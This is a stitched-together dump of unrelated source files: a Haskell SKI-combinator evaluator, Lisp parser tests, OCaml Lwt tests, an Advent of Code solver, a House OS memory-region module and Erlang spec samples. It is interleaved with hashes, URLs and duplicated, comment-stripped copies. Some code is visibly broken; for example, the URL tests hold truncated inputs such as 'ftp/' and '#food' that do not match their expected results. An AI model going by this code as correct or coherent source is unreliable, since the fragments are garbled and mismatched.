call (S1 x) y = S2 x y
call (S2 x y) z = eval x `call` z `call` app y z
call K0 x = K1 x
call (K1 x) _ = eval x
call I0 x = eval x
eval :: Term -> Neutral
eval (N t) = t
eval (A t _ _) = t
app :: Term -> Term -> Term
app (N S0) x = N (S1 x)
app (N (S1 x)) y = N (S2 x y)
app (N K0) x = N (K1 x)
app (N I0) x = x
app l r = A (eval l `call` r) l r
_S0, _K0, _I0 :: Term
_S0 = N S0
_K0 = N K0
_I0 = N I0
|
d474bf8143811792f5fdee9854c31d377c03b5536a3128b031260c1c5d6056a0 | nibbula/yew | parse-util-test.lisp | ;;;
parse-util-test.lisp - Tests for parse - util
;;;
(defpackage :parse-util-test
(:documentation "Tests for parse-util")
(:use :cl :test :parse-util)
(:export
#:run
))
(in-package :parse-util-test)
(defmacro parse-eq (value expr)
`(multiple-value-bind (status result) ,expr
(and status (equal result ,value))))
(defun parse-path (path)
"Parse a unix path."
(with-parsing (path :track-next t)
;; This is so we can distinguish between relative and absolute paths.
Absolute paths will have a " / " as the first element .
(optional
(note ("/") (is-element #\/)))
(zero-or-more
(one-of
(one-or-more (is-element #\/))
(with-sub-sequence (element)
(note (element)
(one-or-more
(is-not-element #\/))))))))
(deftests (parse-util-path)
(parse-eq '() (parse-path ""))
(parse-eq '("/") (parse-path "/"))
(parse-eq '("foo" "bar") (parse-path "foo/bar"))
(parse-eq '("/" "foo" "bar") (parse-path "/foo/bar"))
(parse-eq '("/" "foo" "bar") (parse-path "///foo///bar///"))
(parse-eq '("asdfjk\\" "zurp.aj;l" "d")
(parse-path "asdfjk\\/zurp.aj;l/d")))
(defun parse-command (line)
(with-parsing (line)
(sequence-of
(one-of (note ("corge") (is-sequence "corge"))
(note ("gralt") (is-sequence "gralt"))
(note ("egg") (is-sequence "egg"))
(note ("cat") (is-sequence "cat")))
(zero-or-more
(one-or-more (is-element #\space))
(with-sub-sequence (word)
(note (word) (one-or-more (is-not-element #\space))))))))
(deftests (parse-util-command)
(not (parse-command ""))
(parse-eq '("corge") (parse-command "corge"))
(parse-eq '("cat") (parse-command "cat"))
(parse-eq '("cat" "food" "in" "cans") (parse-command "cat food in cans"))
(parse-eq '("egg" "is" "good") (parse-command "egg is good"))
(not (parse-command "can cat?")))
(defun parse-url (url)
(with-parsing (url :track-next t)
(optional
(sequence-of
(with-sub-sequence (scheme)
(note ((list :scheme scheme))
(one-or-more (and (not (in-sequence ":/?#")) (next-element)))))
(is-element #\:)))
(optional
(sequence-of
(is-sequence "//")
(with-sub-sequence (host)
(note (`(:host ,host))
(zero-or-more (and (not (in-sequence "/?#")) (next-element)))))))
(let (path)
(note (`(:path ,@(nreverse path)))
(zero-or-more
(one-of
(one-or-more (is-element #\/))
(with-sub-sequence (element)
(and
(one-or-more
(and (not (in-sequence "/?#")) (next-element)))
(push element path)))))))
(optional
(sequence-of
(is-element #\?)
(with-sub-sequence (query)
(note (`(:query ,query))
(zero-or-more
(is-not-element #\#))))))
(optional
(sequence-of
(is-element #\#)
(with-sub-sequence (fragment)
(note (`(:fragment ,fragment))
(zero-or-more
(is-not-element #\#))))))))
(deftests (parse-util-url)
(parse-eq '((:scheme "nibs") (:host "") (:path)) (parse-url "nibs://"))
(parse-eq '((:scheme "ftp") (:host "example.org") (:path "ding" "bats"))
(parse-url "ftp/"))
(parse-eq '((:scheme "http") (:host "example.com") (:path "hi" "there")
(:query "fish") (:fragment "food"))
(parse-url "#food"))
(not (parse-command "hoop:dupe/scoop&loops")))
(deftests (parse-util-all :doc "Test :parse-util.")
parse-util-path
parse-util-command
parse-util-url)
(defun run ()
(run-group-name 'parse-util-all :verbose t))
;; End
| null | https://raw.githubusercontent.com/nibbula/yew/8ce7130b1d6c58fe44a38ed58a1f59285a71935c/lib/parse-util-test.lisp | lisp |
This is so we can distinguish between relative and absolute paths.
End | parse-util-test.lisp - Tests for parse - util
(defpackage :parse-util-test
(:documentation "Tests for parse-util")
(:use :cl :test :parse-util)
(:export
#:run
))
(in-package :parse-util-test)
(defmacro parse-eq (value expr)
`(multiple-value-bind (status result) ,expr
(and status (equal result ,value))))
(defun parse-path (path)
"Parse a unix path."
(with-parsing (path :track-next t)
Absolute paths will have a " / " as the first element .
(optional
(note ("/") (is-element #\/)))
(zero-or-more
(one-of
(one-or-more (is-element #\/))
(with-sub-sequence (element)
(note (element)
(one-or-more
(is-not-element #\/))))))))
(deftests (parse-util-path)
(parse-eq '() (parse-path ""))
(parse-eq '("/") (parse-path "/"))
(parse-eq '("foo" "bar") (parse-path "foo/bar"))
(parse-eq '("/" "foo" "bar") (parse-path "/foo/bar"))
(parse-eq '("/" "foo" "bar") (parse-path "///foo///bar///"))
(parse-eq '("asdfjk\\" "zurp.aj;l" "d")
(parse-path "asdfjk\\/zurp.aj;l/d")))
(defun parse-command (line)
(with-parsing (line)
(sequence-of
(one-of (note ("corge") (is-sequence "corge"))
(note ("gralt") (is-sequence "gralt"))
(note ("egg") (is-sequence "egg"))
(note ("cat") (is-sequence "cat")))
(zero-or-more
(one-or-more (is-element #\space))
(with-sub-sequence (word)
(note (word) (one-or-more (is-not-element #\space))))))))
(deftests (parse-util-command)
(not (parse-command ""))
(parse-eq '("corge") (parse-command "corge"))
(parse-eq '("cat") (parse-command "cat"))
(parse-eq '("cat" "food" "in" "cans") (parse-command "cat food in cans"))
(parse-eq '("egg" "is" "good") (parse-command "egg is good"))
(not (parse-command "can cat?")))
(defun parse-url (url)
(with-parsing (url :track-next t)
(optional
(sequence-of
(with-sub-sequence (scheme)
(note ((list :scheme scheme))
(one-or-more (and (not (in-sequence ":/?#")) (next-element)))))
(is-element #\:)))
(optional
(sequence-of
(is-sequence "//")
(with-sub-sequence (host)
(note (`(:host ,host))
(zero-or-more (and (not (in-sequence "/?#")) (next-element)))))))
(let (path)
(note (`(:path ,@(nreverse path)))
(zero-or-more
(one-of
(one-or-more (is-element #\/))
(with-sub-sequence (element)
(and
(one-or-more
(and (not (in-sequence "/?#")) (next-element)))
(push element path)))))))
(optional
(sequence-of
(is-element #\?)
(with-sub-sequence (query)
(note (`(:query ,query))
(zero-or-more
(is-not-element #\#))))))
(optional
(sequence-of
(is-element #\#)
(with-sub-sequence (fragment)
(note (`(:fragment ,fragment))
(zero-or-more
(is-not-element #\#))))))))
(deftests (parse-util-url)
(parse-eq '((:scheme "nibs") (:host "") (:path)) (parse-url "nibs://"))
(parse-eq '((:scheme "ftp") (:host "example.org") (:path "ding" "bats"))
(parse-url "ftp/"))
(parse-eq '((:scheme "http") (:host "example.com") (:path "hi" "there")
(:query "fish") (:fragment "food"))
(parse-url "#food"))
(not (parse-command "hoop:dupe/scoop&loops")))
(deftests (parse-util-all :doc "Test :parse-util.")
parse-util-path
parse-util-command
parse-util-url)
(defun run ()
(run-group-name 'parse-util-all :verbose t))
|
938dd8ad98414842b53bc05698c1bc458ee3cca59abfeba4d4897caadc489b39 | ocsigen/lwt | test_lwt_engine.ml | This file is part of Lwt , released under the MIT license . See LICENSE.md for
details , or visit .
details, or visit . *)
open Test
open Lwt.Infix
let selection_tests = [
test "libev: default when enabled in build bot"
(fun () ->
if not Lwt_config._HAVE_LIBEV then Lwt.return_true
else
Check if this is running inside or AppVeyor .
let in_travis =
try ignore (Sys.getenv "TRAVIS_COMMIT"); true
with Not_found -> false
in
let in_appveyor =
try ignore (Sys.getenv "APPVEYOR_REPO_COMMIT"); true
with Not_found -> false
in
if not (in_travis || in_appveyor) then Lwt.return_true
else Lwt.return Lwt_config.libev_default);
]
let tests = selection_tests
let timing_tests = [
test "libev: timer delays are not too short" begin fun () ->
let start = Unix.gettimeofday () in
Lwt.catch
(fun () ->
Block the entire process for one second . If using libev , libev 's
notion of the current time is not updated during this period .
notion of the current time is not updated during this period. *)
let () = Unix.sleep 1 in
At this point , thinks that the time is what it was about one
second ago . Now schedule exception Lwt_unix . Timeout to be raised in
0.5 seconds . If the implementation is incorrect , the exception will
be raised immediately , because the 0.5 seconds will be measured
relative to libev 's " current " time of one second ago .
second ago. Now schedule exception Lwt_unix.Timeout to be raised in
0.5 seconds. If the implementation is incorrect, the exception will
be raised immediately, because the 0.5 seconds will be measured
relative to libev's "current" time of one second ago. *)
Lwt_unix.timeout 0.5)
(function
| Lwt_unix.Timeout ->
Lwt.return (Unix.gettimeofday ())
| exn ->
Lwt.fail exn)
>>= fun stop ->
Lwt.return (stop -. start >= 1.5)
end;
]
let tests = tests @ timing_tests
let run_tests = [
test "Lwt_main.run: nested call" ~sequential:true begin fun () ->
(* The test itself is already running under Lwt_main.run, so we just have to
call it once and make sure we get an exception. *)
(* Make sure we are running in a callback called by Lwt_main.run, not
synchronously when the testing executable is loaded. *)
Lwt.pause () >>= fun () ->
try
Lwt_main.run (Lwt.return_unit);
Lwt.return_false
with Failure _ ->
Lwt.return_true
end;
]
let tests = tests @ run_tests
let suite = suite "lwt_engine" tests
| null | https://raw.githubusercontent.com/ocsigen/lwt/aa9d18a550da444e1a889867dad52a32f162b262/test/unix/test_lwt_engine.ml | ocaml | The test itself is already running under Lwt_main.run, so we just have to
call it once and make sure we get an exception.
Make sure we are running in a callback called by Lwt_main.run, not
synchronously when the testing executable is loaded. | This file is part of Lwt , released under the MIT license . See LICENSE.md for
details , or visit .
details, or visit . *)
open Test
open Lwt.Infix
let selection_tests = [
test "libev: default when enabled in build bot"
(fun () ->
if not Lwt_config._HAVE_LIBEV then Lwt.return_true
else
Check if this is running inside or AppVeyor .
let in_travis =
try ignore (Sys.getenv "TRAVIS_COMMIT"); true
with Not_found -> false
in
let in_appveyor =
try ignore (Sys.getenv "APPVEYOR_REPO_COMMIT"); true
with Not_found -> false
in
if not (in_travis || in_appveyor) then Lwt.return_true
else Lwt.return Lwt_config.libev_default);
]
let tests = selection_tests
let timing_tests = [
test "libev: timer delays are not too short" begin fun () ->
let start = Unix.gettimeofday () in
Lwt.catch
(fun () ->
Block the entire process for one second . If using libev , libev 's
notion of the current time is not updated during this period .
notion of the current time is not updated during this period. *)
let () = Unix.sleep 1 in
At this point , thinks that the time is what it was about one
second ago . Now schedule exception Lwt_unix . Timeout to be raised in
0.5 seconds . If the implementation is incorrect , the exception will
be raised immediately , because the 0.5 seconds will be measured
relative to libev 's " current " time of one second ago .
second ago. Now schedule exception Lwt_unix.Timeout to be raised in
0.5 seconds. If the implementation is incorrect, the exception will
be raised immediately, because the 0.5 seconds will be measured
relative to libev's "current" time of one second ago. *)
Lwt_unix.timeout 0.5)
(function
| Lwt_unix.Timeout ->
Lwt.return (Unix.gettimeofday ())
| exn ->
Lwt.fail exn)
>>= fun stop ->
Lwt.return (stop -. start >= 1.5)
end;
]
let tests = tests @ timing_tests
let run_tests = [
test "Lwt_main.run: nested call" ~sequential:true begin fun () ->
Lwt.pause () >>= fun () ->
try
Lwt_main.run (Lwt.return_unit);
Lwt.return_false
with Failure _ ->
Lwt.return_true
end;
]
let tests = tests @ run_tests
let suite = suite "lwt_engine" tests
|
1c280e27d7a611dcb79f8ade0ee076bb6c0f6ab66173d2188f9a4443623b0f76 | bcc32/advent-of-code | a.ml | open! Core
let rec dfs grid i j di dj back ~f =
let turn () =
match
[ i - 1, j; i, j - 1; i, j + 1; i + 1, j ]
|> List.filter ~f:(fun (x, y) ->
0 <= x && x < Array.length grid && 0 <= y && y < String.length grid.(x))
|> List.filter ~f:(fun (x, y) ->
not ([%equal: (int * int) option] (Some (x, y)) back))
|> List.filter ~f:(fun (x, y) -> Char.( <> ) grid.(x).[y] ' ')
with
| [] -> () (* done *)
| [ (i', j') ] -> dfs grid i' j' (i' - i) (j' - j) (Some (i, j)) ~f
| l -> raise_s [%message (l : (int * int) list) (i : int) (j : int)]
in
let proceed () =
match grid.(i + di).[j + dj] with
| ' ' -> turn ()
| exception _ -> turn ()
| _ -> dfs grid (i + di) (j + dj) di dj (Some (i, j)) ~f
in
match grid.(i).[j] with
| 'A' .. 'Z' as c ->
f c;
proceed ()
| '-' | '|' | '+' -> proceed ()
| ' ' -> ()
| exception _ -> ()
| c -> invalid_arg (String.of_char c)
;;
let () =
let input =
In_channel.with_file (Sys.get_argv ()).(1) ~f:In_channel.input_lines |> Array.of_list
in
let letters = ref [] in
for j = 0 to String.length input.(0) do
dfs input 0 j 1 0 None ~f:(fun letter -> letters := letter :: !letters)
done;
!letters |> List.rev |> String.of_char_list |> print_endline
;;
| null | https://raw.githubusercontent.com/bcc32/advent-of-code/653c0f130e2fb2f599d4e76804e02af54c9bb19f/2017/19/a.ml | ocaml | done | open! Core
let rec dfs grid i j di dj back ~f =
let turn () =
match
[ i - 1, j; i, j - 1; i, j + 1; i + 1, j ]
|> List.filter ~f:(fun (x, y) ->
0 <= x && x < Array.length grid && 0 <= y && y < String.length grid.(x))
|> List.filter ~f:(fun (x, y) ->
not ([%equal: (int * int) option] (Some (x, y)) back))
|> List.filter ~f:(fun (x, y) -> Char.( <> ) grid.(x).[y] ' ')
with
| [ (i', j') ] -> dfs grid i' j' (i' - i) (j' - j) (Some (i, j)) ~f
| l -> raise_s [%message (l : (int * int) list) (i : int) (j : int)]
in
let proceed () =
match grid.(i + di).[j + dj] with
| ' ' -> turn ()
| exception _ -> turn ()
| _ -> dfs grid (i + di) (j + dj) di dj (Some (i, j)) ~f
in
match grid.(i).[j] with
| 'A' .. 'Z' as c ->
f c;
proceed ()
| '-' | '|' | '+' -> proceed ()
| ' ' -> ()
| exception _ -> ()
| c -> invalid_arg (String.of_char c)
;;
let () =
let input =
In_channel.with_file (Sys.get_argv ()).(1) ~f:In_channel.input_lines |> Array.of_list
in
let letters = ref [] in
for j = 0 to String.length input.(0) do
dfs input 0 j 1 0 None ~f:(fun letter -> letters := letter :: !letters)
done;
!letters |> List.rev |> String.of_char_list |> print_endline
;;
|
f7f85aabb47e1c3fa198c554c809165458901f9602330599f7cf079b34a6f876 | ygmpkk/house | MemRegion.hs | | Memory regions for memory - mapped IO and other reserved memory
( section 3.4 in the paper )
module H.MemRegion(
H,
withTempRegion ,
pokeByteOff,peekByteOff,pokeElemOff,peekElemOff,moveBytes,copyArray,
fillRegion,pokeArray,
uncheckedPokeElemOff,
Storable,SafePtr,safePtr,peek,poke,
-- * Deprecated
pokeByteIntOff,peekByteIntOff,pokeElemIntOff,peekElemIntOff
) where
import qualified H.AdHocMem as U
import H.AdHocMem(H,Ptr,castPtr,plusPtr,allocaArray)
import Foreign.Storable(Storable,sizeOf)
import Data.Word(Word8,Word32)
import Data.Array.IArray(bounds,(!))
import Data.Ix(rangeSize)
For SPECIALIZE pragma :
import Data.Array.Unboxed(UArray)
import Data.Word(Word8,Word16,Word32)
-------------------------- INTERFACE -------------------------------------------
---- Memory regions ----
type MemRegion
type Offset = Word32
type Size = Word32
createRegion :: Ptr Word8 -> Offset -> MemRegion -- unsafe!
regionSize :: MemRegion -> Offset
--withTempRegion :: Size -> (MemRegion->H ()) -> H ()
-- It's unsafe to return the temporary region.
--- Accessing a memory region, requires dynamic safety checks:
pokeByteOff :: Storable a => MemRegion -> Offset -> a -> H ()
peekByteOff :: Storable a => MemRegion -> Offset -> H a
pokeElemOff :: Storable a => MemRegion -> Offset -> a -> H ()
peekElemOff :: Storable a => MemRegion -> Offset -> H a
uncheckedPokeElemOff :: Storable a => MemRegion -> Offset -> a -> H () --unsafe!
moveBytes :: MemRegion->Offset->MemRegion->Offset->Size-> H ()
copyArray :: Storable a => MemRegion->Offset->Ptr a ->Size-> H ()
--- Accessing memory with signed Int offsets, not recommended
# DEPRECATED pokeByteIntOff , peekByteIntOff , pokeElemIntOff , peekElemIntOff
" Use Offset ( ) instead of Int for memory region offsets " #
"Use Offset (Word32) instead of Int for memory region offsets" #-}
pokeByteIntOff :: (Storable a) => MemRegion -> Int -> a -> H ()
peekByteIntOff :: (Storable a) => MemRegion -> Int -> H a
pokeElemIntOff :: (Storable a) => MemRegion -> Int -> a -> H ()
peekElemIntOff :: (Storable a) => MemRegion -> Int -> H a
---- Safe Pointers ----
type SafePtr a
--- Creating a safe pointer, requires a dynamic safety check
safePtr :: Storable a => MemRegion -> Offset -> H (SafePtr a)
--- Access to memory via safe pointers, free from dynamic checks
poke :: (Storable a) => (SafePtr a) -> a -> H ()
peek :: (Storable a) => (SafePtr a) -> H a
-------------------------- IMPLEMENTATION --------------------------------------
data MemRegion = MR { base:: !(Ptr Word8), size:: !Size }
deriving Show
newtype SafePtr a = SafePtr (Ptr a)
Usafe :
createRegion = MR -- could also check for overlap with known regions
regionSize = size
withTempRegion size h = allocaArray ( w2i size ) ( \ p - > h ( MR p size ) )
safePtr (MR base size) o =
case base +. o of
p -> if o+s<=size
then return (SafePtr p)
else fail "Trying to create pointer to object outside region"
where
s = elSize (deref p)
deref :: Ptr a -> a -- just a type checking trick
deref = undefined
poke (SafePtr p) = U.poke p
peek (SafePtr p) = U.peek p
pokeByteOff mr o x =
do p <- safePtr mr o
poke p x
peekByteOff mr o =
do p <- safePtr mr o
peek p
pokeElemOff mr o x = pokeByteOff mr (o*elSize x) x
{-
pokeElemOff (MR base size) eo x | o+s<=size = U.pokeByteOff base (w2i o) x
where --"pokeElemOff outside region"
s = elSize x
o = eo*s
-}
uncheckedPokeElemOff (MR base _) o x =
U.pokeElemOff (castPtr base) (w2i o) x
peekElemOff mr o = peekElemOff' mr o undefined
where
peekElemOff' :: (Storable a) => MemRegion -> Word32 -> a -> H a
peekElemOff' mr o dummy = peekByteOff mr (o*elSize dummy)
pokeByteIntOff mr o | o>=0 = pokeByteOff mr (i2w o)
peekByteIntOff mr o | o>=0 = peekByteOff mr (i2w o)
pokeElemIntOff mr o | o>=0 = pokeElemOff mr (i2w o)
peekElemIntOff mr o | o>=0 = peekElemOff mr (i2w o)
moveBytes dstr dsto srcr srco n =
do dst <- safePtr' dstr dsto n
src <- safePtr' srcr srco n
U.moveBytes dst src (w2i n)
safePtr' :: MemRegion -> Offset -> Offset -> H (Ptr Word8)
safePtr' (MR base size) o esize =
if o+esize<=size
then return (base +. o)
else fail "Trying to create pointer to object outside region"
copyArray dstr dsto ptr n = copyArray' dstr dsto ptr undefined n
where
copyArray' :: Storable a=>MemRegion->Offset->Ptr a->a->Offset->H ()
copyArray' dstr dsto src dummy n =
do let el=elSize dummy
bcnt = n*el
dst <- safePtr' dstr (dsto*el) bcnt
U.moveBytes dst (castPtr src) (w2i bcnt)
fillRegion (MR b s) x =
sequence_ [U.pokeElemOff (castPtr b) i x|i<-[0..w2i s `div` sizeOf x]]
pokeArray mr o a =
do dst <- safePtr' mr o (elSize (a!undefined)*cnt)
U.pokeArray (castPtr dst) a
where
cnt = i2w $ rangeSize (bounds a)
-- Type abbreviation used only by the SPECIALIZE pragmas below, which ask GHC
-- to generate monomorphic copies of 'pokeArray' for the common element types.
type PokeArray d = MemRegion -> Offset -> UArray Int d -> H ()
{-# SPECIALIZE pokeArray :: PokeArray Word8 #-}
{-# SPECIALIZE pokeArray :: PokeArray Word16 #-}
{-# SPECIALIZE pokeArray :: PokeArray Word32 #-}
-- Unsigned versions of plusPtr and sizeOf:
-- | 'plusPtr' taking an unsigned (Word32) byte offset.
ptr +. off = plusPtr ptr (w2i off)
-- | 'sizeOf' returning an unsigned (Word32) byte count.
elSize = i2w . sizeOf
-- Shorthand conversions ('fromIntegral' spelled out everywhere is noisy).
i2w :: Int -> Word32
i2w = fromIntegral
w2i :: Word32 -> Int
w2i = fromIntegral
| null | https://raw.githubusercontent.com/ygmpkk/house/1ed0eed82139869e85e3c5532f2b579cf2566fa2/kernel/H/MemRegion.hs | haskell | * Deprecated
------------------------ INTERFACE -------------------------------------------
-- Memory regions ----
unsafe!
withTempRegion :: Size -> (MemRegion->H ()) -> H ()
It's unsafe to return the temporary region.
- Accessing a memory region, requires dynamic safety checks:
unsafe!
- Accessing memory with signed Int offsets, not recommended
-- Safe Pointers ----
- Creating a safe pointer, requires a dynamic safety check
- Access to memory via safe pointers, free from dynamic checks
------------------------ IMPLEMENTATION --------------------------------------
could also check for overlap with known regions
just a type checking trick
pokeElemOff (MR base size) eo x | o+s<=size = U.pokeByteOff base (w2i o) x
where --"pokeElemOff outside region"
s = elSize x
o = eo*s
# SPECIALIZE pokeArray :: PokeArray Word8 #
# SPECIALIZE pokeArray :: PokeArray Word16 #
# SPECIALIZE pokeArray :: PokeArray Word32 #
- fromIntegral is such a loooong name... | | Memory regions for memory - mapped IO and other reserved memory
( section 3.4 in the paper )
module H.MemRegion(
H,
withTempRegion ,
pokeByteOff,peekByteOff,pokeElemOff,peekElemOff,moveBytes,copyArray,
fillRegion,pokeArray,
uncheckedPokeElemOff,
Storable,SafePtr,safePtr,peek,poke,
pokeByteIntOff,peekByteIntOff,pokeElemIntOff,peekElemIntOff
) where
import qualified H.AdHocMem as U
import H.AdHocMem(H,Ptr,castPtr,plusPtr,allocaArray)
import Foreign.Storable(Storable,sizeOf)
import Data.Word(Word8,Word32)
import Data.Array.IArray(bounds,(!))
import Data.Ix(rangeSize)
For SPECIALIZE pragma :
import Data.Array.Unboxed(UArray)
import Data.Word(Word8,Word16,Word32)
type MemRegion
type Offset = Word32
type Size = Word32
regionSize :: MemRegion -> Offset
pokeByteOff :: Storable a => MemRegion -> Offset -> a -> H ()
peekByteOff :: Storable a => MemRegion -> Offset -> H a
pokeElemOff :: Storable a => MemRegion -> Offset -> a -> H ()
peekElemOff :: Storable a => MemRegion -> Offset -> H a
moveBytes :: MemRegion->Offset->MemRegion->Offset->Size-> H ()
copyArray :: Storable a => MemRegion->Offset->Ptr a ->Size-> H ()
# DEPRECATED pokeByteIntOff , peekByteIntOff , pokeElemIntOff , peekElemIntOff
" Use Offset ( ) instead of Int for memory region offsets " #
"Use Offset (Word32) instead of Int for memory region offsets" #-}
pokeByteIntOff :: (Storable a) => MemRegion -> Int -> a -> H ()
peekByteIntOff :: (Storable a) => MemRegion -> Int -> H a
pokeElemIntOff :: (Storable a) => MemRegion -> Int -> a -> H ()
peekElemIntOff :: (Storable a) => MemRegion -> Int -> H a
type SafePtr a
safePtr :: Storable a => MemRegion -> Offset -> H (SafePtr a)
poke :: (Storable a) => (SafePtr a) -> a -> H ()
peek :: (Storable a) => (SafePtr a) -> H a
data MemRegion = MR { base:: !(Ptr Word8), size:: !Size }
deriving Show
newtype SafePtr a = SafePtr (Ptr a)
Usafe :
regionSize = size
withTempRegion size h = allocaArray ( w2i size ) ( \ p - > h ( MR p size ) )
safePtr (MR base size) o =
case base +. o of
p -> if o+s<=size
then return (SafePtr p)
else fail "Trying to create pointer to object outside region"
where
s = elSize (deref p)
deref = undefined
poke (SafePtr p) = U.poke p
peek (SafePtr p) = U.peek p
pokeByteOff mr o x =
do p <- safePtr mr o
poke p x
peekByteOff mr o =
do p <- safePtr mr o
peek p
pokeElemOff mr o x = pokeByteOff mr (o*elSize x) x
uncheckedPokeElemOff (MR base _) o x =
U.pokeElemOff (castPtr base) (w2i o) x
peekElemOff mr o = peekElemOff' mr o undefined
where
peekElemOff' :: (Storable a) => MemRegion -> Word32 -> a -> H a
peekElemOff' mr o dummy = peekByteOff mr (o*elSize dummy)
pokeByteIntOff mr o | o>=0 = pokeByteOff mr (i2w o)
peekByteIntOff mr o | o>=0 = peekByteOff mr (i2w o)
pokeElemIntOff mr o | o>=0 = pokeElemOff mr (i2w o)
peekElemIntOff mr o | o>=0 = peekElemOff mr (i2w o)
moveBytes dstr dsto srcr srco n =
do dst <- safePtr' dstr dsto n
src <- safePtr' srcr srco n
U.moveBytes dst src (w2i n)
safePtr' :: MemRegion -> Offset -> Offset -> H (Ptr Word8)
safePtr' (MR base size) o esize =
if o+esize<=size
then return (base +. o)
else fail "Trying to create pointer to object outside region"
copyArray dstr dsto ptr n = copyArray' dstr dsto ptr undefined n
where
copyArray' :: Storable a=>MemRegion->Offset->Ptr a->a->Offset->H ()
copyArray' dstr dsto src dummy n =
do let el=elSize dummy
bcnt = n*el
dst <- safePtr' dstr (dsto*el) bcnt
U.moveBytes dst (castPtr src) (w2i bcnt)
fillRegion (MR b s) x =
sequence_ [U.pokeElemOff (castPtr b) i x|i<-[0..w2i s `div` sizeOf x]]
pokeArray mr o a =
do dst <- safePtr' mr o (elSize (a!undefined)*cnt)
U.pokeArray (castPtr dst) a
where
cnt = i2w $ rangeSize (bounds a)
type PokeArray d = MemRegion -> Offset -> UArray Int d -> H ()
Unsigned versions of plusPtr and :
p +. n = plusPtr p (w2i n)
elSize x = i2w (sizeOf x)
i2w :: Int->Word32
w2i :: Word32->Int
i2w = fromIntegral
w2i = fromIntegral
|
a6072ab640dc074e487da82883a63671db473f8e10ed5b197cd8e012a5bfa1de | tek/chiasma | ProcessError.hs | module Chiasma.Data.ProcessError where
data ProcessError =
Terminated Text
deriving stock (Eq, Show)
| null | https://raw.githubusercontent.com/tek/chiasma/51751e19a416a9afe12f7797df8a67990b266240/packages/chiasma/lib/Chiasma/Data/ProcessError.hs | haskell | module Chiasma.Data.ProcessError where
data ProcessError =
Terminated Text
deriving stock (Eq, Show)
| |
10f325e583476f0e8b4bd2be4fc37f22ead597af37b91125fbefeb79650c7fb7 | mbj/stratosphere | CloudWatchDestinationProperty.hs | module Stratosphere.SES.ConfigurationSetEventDestination.CloudWatchDestinationProperty (
module Exports, CloudWatchDestinationProperty(..),
mkCloudWatchDestinationProperty
) where
import qualified Data.Aeson as JSON
import qualified Stratosphere.Prelude as Prelude
import Stratosphere.Property
import {-# SOURCE #-} Stratosphere.SES.ConfigurationSetEventDestination.DimensionConfigurationProperty as Exports
import Stratosphere.ResourceProperties
data CloudWatchDestinationProperty
= CloudWatchDestinationProperty {dimensionConfigurations :: (Prelude.Maybe [DimensionConfigurationProperty])}
mkCloudWatchDestinationProperty :: CloudWatchDestinationProperty
mkCloudWatchDestinationProperty
= CloudWatchDestinationProperty
{dimensionConfigurations = Prelude.Nothing}
instance ToResourceProperties CloudWatchDestinationProperty where
toResourceProperties CloudWatchDestinationProperty {..}
= ResourceProperties
{awsType = "AWS::SES::ConfigurationSetEventDestination.CloudWatchDestination",
supportsTags = Prelude.False,
properties = Prelude.fromList
(Prelude.catMaybes
[(JSON..=) "DimensionConfigurations"
Prelude.<$> dimensionConfigurations])}
instance JSON.ToJSON CloudWatchDestinationProperty where
toJSON CloudWatchDestinationProperty {..}
= JSON.object
(Prelude.fromList
(Prelude.catMaybes
[(JSON..=) "DimensionConfigurations"
Prelude.<$> dimensionConfigurations]))
instance Property "DimensionConfigurations" CloudWatchDestinationProperty where
type PropertyType "DimensionConfigurations" CloudWatchDestinationProperty = [DimensionConfigurationProperty]
set newValue CloudWatchDestinationProperty {}
= CloudWatchDestinationProperty
{dimensionConfigurations = Prelude.pure newValue, ..} | null | https://raw.githubusercontent.com/mbj/stratosphere/c70f301715425247efcda29af4f3fcf7ec04aa2f/services/ses/gen/Stratosphere/SES/ConfigurationSetEventDestination/CloudWatchDestinationProperty.hs | haskell | # SOURCE # | module Stratosphere.SES.ConfigurationSetEventDestination.CloudWatchDestinationProperty (
module Exports, CloudWatchDestinationProperty(..),
mkCloudWatchDestinationProperty
) where
import qualified Data.Aeson as JSON
import qualified Stratosphere.Prelude as Prelude
import Stratosphere.Property
import Stratosphere.ResourceProperties
data CloudWatchDestinationProperty
= CloudWatchDestinationProperty {dimensionConfigurations :: (Prelude.Maybe [DimensionConfigurationProperty])}
mkCloudWatchDestinationProperty :: CloudWatchDestinationProperty
mkCloudWatchDestinationProperty
= CloudWatchDestinationProperty
{dimensionConfigurations = Prelude.Nothing}
instance ToResourceProperties CloudWatchDestinationProperty where
toResourceProperties CloudWatchDestinationProperty {..}
= ResourceProperties
{awsType = "AWS::SES::ConfigurationSetEventDestination.CloudWatchDestination",
supportsTags = Prelude.False,
properties = Prelude.fromList
(Prelude.catMaybes
[(JSON..=) "DimensionConfigurations"
Prelude.<$> dimensionConfigurations])}
instance JSON.ToJSON CloudWatchDestinationProperty where
toJSON CloudWatchDestinationProperty {..}
= JSON.object
(Prelude.fromList
(Prelude.catMaybes
[(JSON..=) "DimensionConfigurations"
Prelude.<$> dimensionConfigurations]))
instance Property "DimensionConfigurations" CloudWatchDestinationProperty where
type PropertyType "DimensionConfigurations" CloudWatchDestinationProperty = [DimensionConfigurationProperty]
set newValue CloudWatchDestinationProperty {}
= CloudWatchDestinationProperty
{dimensionConfigurations = Prelude.pure newValue, ..} |
ada2ff384cc53fe89d8b86ebcdbc9fa71e9475e72cd02a31ef1f90d7e5bdfe49 | josefs/Gradualizer | map_literal.erl | -module(map_literal).
-export([f/0]).
-spec f() -> ok.
f() -> #{apa => bepa}.
| null | https://raw.githubusercontent.com/josefs/Gradualizer/208f5816b0157f282212fc036ba7560f0822f9fc/test/should_fail/map_literal.erl | erlang | -module(map_literal).
-export([f/0]).
-spec f() -> ok.
f() -> #{apa => bepa}.
| |
33bfe90530f21463f60ae3af7a71cace23464025a110fce6758a64da3bb4bd15 | AdRoll/rebar3_format | long_specs.erl | -module(long_specs).
-compile(export_all).
-callback handle_call(term(), {pid(), reference()}, state()) -> {reply, Reply, state()} | {stop, unexpected_call, state()} when Reply :: ok | {error, {already_registered, pid()}}.
-spec handle_call(term(), {pid(), reference()}, state()) -> {reply, Reply, state()} | {stop, unexpected_call, state()} when Reply :: ok | {error, {already_registered, pid()}}.
handle_call(_, _, _) ->
ok.
-callback metric(Name, Value, Type) -> Result when Name :: binary(), Value :: value(), Type :: metric_type(), Result :: ok.
-spec metric(Name, Value, Type) -> Result when Name :: binary(), Value :: value(), Type :: metric_type(), Result :: ok.
metric(_, _, _) ->
ok.
-callback send(Name :: binary(), Value :: binary(), Type :: metric_type(), Tags :: [bin_kv()]) -> ok.
-spec send(Name :: binary(), Value :: binary(), Type :: metric_type(), Tags :: [bin_kv()]) -> ok.
send(_, _, _, _) ->
ok.
